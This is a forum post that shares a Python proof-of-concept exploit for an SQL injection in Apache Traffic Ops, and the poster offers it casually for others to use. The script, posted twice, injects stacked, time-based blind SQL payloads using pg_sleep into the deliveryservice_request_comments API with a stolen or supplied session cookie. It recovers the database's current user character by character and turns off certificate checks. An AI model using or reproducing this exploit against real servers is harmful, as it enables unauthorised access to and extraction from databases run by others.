01-09-2025, 07:05 PM
https://biteblob.com/Information/Z7KWARd...387-PoC.py Apache Traffic Control SQL Injection, Read more about the CVE on nvd, or mitre, this is a proof of concept for people to use cause im bored asf, hope yall know how to do an sql injection cause i aint supplying no tutorial shit 
Source code: #!/usr/bin/python3
import requests
import argparse
import logging
from string import printable
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description="Apache Traffic Ops SQL Injection PoC")
parser.add_argument('--url', required=True, help="Target URL")
parser.add_argument('--cookie', required=True, help="Cookie value for authentication")
parser.add_argument('--debug', action='store_true', help="Enable debug logging")
return parser.parse_args()
def strip_trailing_slash(url):
if url.endswith('/'):
return url[:-1]
return url
def setup_logging(debug):
log_level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(level=log_level, format='%(asctime)s - %(levelname)s - %(message)s')
def get_length(url, cookie):
data = {
"deliveryServiceRequestId": 2,
"value": "SQLI Test"
}
headers = {
"Cookie": cookie
}
for i in range(15):
payload = f'%3bSELECT CASE WHEN (length(current_user) = {i}) THEN pg_sleep(3) ELSE pg_sleep(0) END'
resp = requests.put(url + '/api/5.0/deliveryservice_request_comments?id=1' + payload, verify=False, json=data, headers=headers)
logging.debug(f"Payload: {payload} - Response Time: {resp.elapsed.seconds} seconds")
if resp.elapsed.seconds >= 3:
return i
def get_current_user(url, cookie):
user = ''
for i in range(1, get_length(url, cookie) + 1):
for x in printable:
data = {
"deliveryServiceRequestId": 2,
"value": "SQLI Test"
}
headers = {
"Cookie": cookie
}
payload = f"%3bSELECT CASE WHEN (substring(current_user FROM {i} FOR 1) = '{x}') THEN pg_sleep(3) ELSE pg_sleep(0) END"
resp = requests.put(url + '/api/5.0/deliveryservice_request_comments?id=1' + payload, verify=False, json=data, headers=headers)
logging.debug(f"Payload: {payload} - Response Time: {resp.elapsed.seconds} seconds")
if resp.elapsed.seconds >= 3:
user += x
logging.info(f"Identified Character for Position {i}: {x}")
break
logging.info(f"Identified Current User: {user}")
def main():
args = parse_args()
setup_logging(args.debug)
url = strip_trailing_slash(args.url)
get_current_user(url, args.cookie)
if __name__ == "__main__":
main()
Source code: #!/usr/bin/python3import requests
import argparse
import logging
from string import printable
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description="Apache Traffic Ops SQL Injection PoC")
parser.add_argument('--url', required=True, help="Target URL")
parser.add_argument('--cookie', required=True, help="Cookie value for authentication")
parser.add_argument('--debug', action='store_true', help="Enable debug logging")
return parser.parse_args()
def strip_trailing_slash(url):
if url.endswith('/'):
return url[:-1]
return url
def setup_logging(debug):
log_level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(level=log_level, format='%(asctime)s - %(levelname)s - %(message)s')
def get_length(url, cookie):
data = {
"deliveryServiceRequestId": 2,
"value": "SQLI Test"
}
headers = {
"Cookie": cookie
}
for i in range(15):
payload = f'%3bSELECT CASE WHEN (length(current_user) = {i}) THEN pg_sleep(3) ELSE pg_sleep(0) END'
resp = requests.put(url + '/api/5.0/deliveryservice_request_comments?id=1' + payload, verify=False, json=data, headers=headers)
logging.debug(f"Payload: {payload} - Response Time: {resp.elapsed.seconds} seconds")
if resp.elapsed.seconds >= 3:
return i
def get_current_user(url, cookie):
user = ''
for i in range(1, get_length(url, cookie) + 1):
for x in printable:
data = {
"deliveryServiceRequestId": 2,
"value": "SQLI Test"
}
headers = {
"Cookie": cookie
}
payload = f"%3bSELECT CASE WHEN (substring(current_user FROM {i} FOR 1) = '{x}') THEN pg_sleep(3) ELSE pg_sleep(0) END"
resp = requests.put(url + '/api/5.0/deliveryservice_request_comments?id=1' + payload, verify=False, json=data, headers=headers)
logging.debug(f"Payload: {payload} - Response Time: {resp.elapsed.seconds} seconds")
if resp.elapsed.seconds >= 3:
user += x
logging.info(f"Identified Character for Position {i}: {x}")
break
logging.info(f"Identified Current User: {user}")
def main():
args = parse_args()
setup_logging(args.debug)
url = strip_trailing_slash(args.url)
get_current_user(url, args.cookie)
if __name__ == "__main__":
main()